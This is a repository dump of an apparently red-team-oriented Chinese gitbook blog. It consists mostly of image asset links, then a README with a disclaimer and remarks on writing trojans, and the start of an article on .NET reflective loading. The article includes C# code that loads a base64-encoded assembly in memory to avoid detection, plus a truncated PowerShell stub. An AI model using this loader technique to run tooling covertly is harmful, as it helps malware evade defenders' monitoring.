https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (282).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (283).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (283).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (284).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (284).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (285).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (285).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (286).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (286).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (287).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (287).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (288).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (288).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (289).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (289).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (29).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (29).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (290).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (290).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (291).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (291).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (3).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (3).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (30).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (30).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (31).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (31).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (32).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (32).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (33).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (33).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (34).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (34).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (35).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (35).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (36).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (36).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (37).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (37).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (38).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (38).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (39).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (39).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (4).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (4).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (40).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (40).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (41).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (41).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (42).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (42).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (43).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (43).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (44).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (44).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (45).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (45).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (46).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (46).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (47).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (47).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (48).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (48).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (49).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (49).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (5).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (5).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (50).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (50).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (51).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (51).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (52).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (52).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (53).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (53).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (54).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (54).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (55).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (55).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (56).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (56).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (57).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (57).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (58).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (58).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (59).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (59).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (6).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (6).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (60).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (60).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (61).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (61).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (62).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (62).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (63).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (63).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (64).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (64).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (65).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (65).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (66).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (66).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (67).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (67).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (68).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (68).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (69).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (69).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (7).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (7).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (70).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (70).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (71).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (71).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (72).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (72).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (73).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (73).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (74).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (74).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (75).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (75).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (76).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (76).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (77).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (77).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (78).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (78).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (79).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (79).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (8).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (8).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (80).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (80).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (81).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (81).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (82).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (82).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (83).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (83).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (84).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (84).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (85).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (85).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (86).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (86).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (87).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (87).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (88).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (88).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (89).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (89).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (9).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (9).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (90).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (90).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (91).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (91).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (92).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (92).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (93).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (93).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (94).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (94).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (95).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (95).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (96).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (96).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (97).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (97).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (98).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (98).png


--------------------------------------------------------------------------------
/.gitbook/assets/image (99).png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image (99).png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191107163603543.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191107163603543.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108093201207.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108093201207.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108094338812.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108094338812.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108094417009.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108094417009.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108100755257.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108100755257.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108100831250.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108100831250.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20191108104747560.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20191108104747560.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20210615113754347.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20210615113754347.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20210615113817201.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20210615113817201.png


--------------------------------------------------------------------------------
/.gitbook/assets/image-20210615113856114.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image-20210615113856114.png


--------------------------------------------------------------------------------
/.gitbook/assets/image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/image.png


--------------------------------------------------------------------------------
/.gitbook/assets/listener.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/listener.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/lj.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/lj.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/opencmd.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/opencmd.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/pi-zhu-20200326-105427 (1).jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/pi-zhu-20200326-105427 (1).jpg


--------------------------------------------------------------------------------
/.gitbook/assets/pi-zhu-20200326-105427.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/pi-zhu-20200326-105427.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/pi-zhu-20200326-113729.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/pi-zhu-20200326-113729.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/pi-zhu-20200326-122609.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/pi-zhu-20200326-122609.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/powershell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/powershell.png


--------------------------------------------------------------------------------
/.gitbook/assets/process-hollowing.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/process-hollowing.gif


--------------------------------------------------------------------------------
/.gitbook/assets/processs-mon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/processs-mon.png


--------------------------------------------------------------------------------
/.gitbook/assets/remote.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/remote.gif


--------------------------------------------------------------------------------
/.gitbook/assets/shi-yi-tu-.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/shi-yi-tu-.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/tasks (1).jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/tasks (1).jpg


--------------------------------------------------------------------------------
/.gitbook/assets/tasks.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/tasks.jpg


--------------------------------------------------------------------------------
/.gitbook/assets/uacflowchart.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/uacflowchart.png


--------------------------------------------------------------------------------
/.gitbook/assets/windows-version.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/idiotc4t/gitbook/146b068760b1551d2e1f05701f0167b523b6148a/.gitbook/assets/windows-version.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # 关于这个博客
 2 | 
 3 | ## About
 4 | 
 5 | ```
 6 | $ wecome to the real network world
 7 | ```
 8 | 
 9 | {% hint style="info" %}
10 |  这个博客仅用于技术交流，任何人不得将上述技术用于非法用途。
11 | 
12 | 1. 无法保证该博客记述内容完全正确
13 | 2. 并不一定会详细解释每一种技术的细节
14 | 3. 引用会给出所有参考链接
15 | 4. 如发现错误请跟我联系
16 | {% endhint %}
17 | 
18 | PS1:我的代码有些臭毛病，不太喜欢按照规范写，总喜欢最少的代码实现最多的功能，所以实际使用的时候该关的句柄关关掉，该释放的内存释放掉。
19 | 
20 | PS2:博客主人这个臭弟弟以前非常喜欢用C\#编写工具，因为C\#真的是方便啊，很多用C/C++实现的东西用C\#几句话就能完事，但是由于托管程序检测越来越严格，还是决定以C为主要开发语言。
21 | 
22 | PS3:如果应用这些技术发现了问题需要联系在下，请务必把代码贴出来\(狗头\)。
23 | 
24 | PS4:以前觉得如果用.net写木马，托管环境初始化在恶意代码运行前，如果微软后续在托管环境接入更多的检测手段\(目前有amsi和defender接口\)，木马会先天劣势，但是现在整个windows的设计在向.net转移，包括不限于.net重写了windbg，所以.net的东西还是不能丢，话是如此观点不变.net不适合写木马，最好作为扩展功能而非主功能。
25 | 
26 | ## 联系方式
27 | 
28 | 需要vx可以直接发邮件给我，会回的。
29 | 
30 | * email idiotc4t@gmail.com
31 | * github 
32 | 
33 | {% embed url="https://github.com/idiotc4t" %}
34 | 
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/.net-fan-she-jia-zai.md:
--------------------------------------------------------------------------------
 1 | # .NET Reflective Injection
 2 | 
 3 | ## 简介
 4 | 
 5 | 反射注入\(ReflectiveInjection\)这种技术也出来好多年了，实现原理大致是不依赖windows提供的loadlibrary函数，程序设计者自己在程序内实现pe的内存展开，由于是自己实现，所以不会在操作系统中有所记录，以及可以对展开的pe文件做一些处理如抹除DOS头，同时不会在peb的ldr链表中记录，发展至今反射注入几乎已经是所有c2的标配技术，github也有非常成熟的项目可供使用，不过由于使用量较大，建议还是简单修改一下再投入实战比较好。
 6 | 
 7 | 上面提到的东西和本文没有任何关联\(略略略\)，.net自身提供了反射加载接口，由于支持内存加载，使用起来会非常方便，不过只能加载.net的程序集，在实战中我们也经常使用这个功能，本篇文章会记录一些System.Reflection命名空间的使用方法。
 8 | 
 9 | ## 思路
10 | 
11 | 这玩意也没什么思路
12 | 
13 | 1. base64编码一个.net程序集
14 | 2. 把base64的程序集解码成一个内存数组
15 | 3. 使用System.Reflection.Assembly.Load内存加载
16 | 4. assembly.EntryPoint.Invoke调用入口点
17 | 
18 | ## 代码
19 | 
20 | 这里直接贴代码。
21 | 
22 | ### c\#
23 | 
24 | ```text
25 | using System;
26 | using System.IO;
27 | using System.Reflection;
28 | 
29 | namespace MemoryLoadApplication
30 | {
31 | 
32 |     class Program
33 |     {
34 | 
35 |         static void Main(string[] args)
36 |         {
37 | 
38 | 
39 | 
40 |             byte[] buffer = File.ReadAllBytes(@"C:\Users\Black Sheep\source\repos\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe");
41 |             string base64str = Convert.ToBase64String(buffer);
42 |             string dir = Directory.GetCurrentDirectory();
43 |             buffer = Convert.FromBase64String(base64str);
44 |             File.WriteAllText($"{dir}\\base64.txt", base64str);
45 |             Assembly assembly = System.Reflection.Assembly.Load(buffer);
46 |             assembly.EntryPoint.Invoke(null, new object[] { args });
47 | 
48 |         }
49 |     }
50 | }
51 | 
52 | ```
53 | 
54 | ### powershell
55 | 
56 | ```text
57 | $base64 = "TVqQAAMAAAAEAAA(前面生成的base64编码的程序集)";
